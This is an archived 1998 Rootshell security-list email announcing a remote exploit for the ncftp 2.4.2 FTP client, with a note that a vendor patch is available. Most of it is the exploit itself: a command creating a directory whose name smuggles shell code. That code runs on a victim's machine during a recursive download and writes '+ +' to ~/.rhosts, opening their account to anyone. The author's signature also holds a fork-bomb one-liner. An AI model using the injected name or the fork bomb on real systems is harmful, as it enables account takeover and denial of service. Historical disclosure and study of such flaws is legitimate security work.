[ http://www.rootshell.com/ ]

A vendor patch is available at http://www.ncftp.com/download/ (Ncftp 2.4.3)

From lcamtuf@boss.staszic.waw.pl Thu Mar 19 13:12:24 1998
Date: Thu, 19 Mar 1998 22:02:48 +0100 (CET)
From: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>
To: info@rootshell.com
Subject: ncftp attack exploit

Here's an ncftp 2.4.2 remote exploit. This time, I'm sure it hasn't been
reported before and it isn't patched. Ok, how to exploit this
vunerability? By the first, you should create evil directory somewhere,
deeply into ftp server directory tree:

[ftp@junk deeply]$ mkdir "\`echo -e \"echo + + >~\57.rhosts\">x;. x;rm -f x\`"

>From now, every attempt of downloading directory structure with
recursive get (eg. "get -R coolest_game_ever", that's one of the most 
popular ncftp features), will cause remote execution of "echo + +>~/.rhosts".
Simple and pretty nice.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=